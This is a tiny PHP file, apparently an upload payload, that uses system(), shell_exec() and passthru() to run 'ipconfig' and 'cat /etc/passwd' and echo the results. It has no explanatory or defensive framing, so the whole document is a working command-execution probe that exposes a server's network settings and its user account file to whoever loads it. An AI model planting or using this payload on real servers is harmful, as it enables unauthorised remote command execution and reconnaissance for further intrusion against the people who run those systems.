<?php
echo system('ipconfig');
echo shell_exec('ipconfig');
echo passthru('ipconfig');
echo system('cat /etc/passwd');
echo shell_exec('cat /etc/passwd');
echo passthru('cat /etc/passwd');
?>
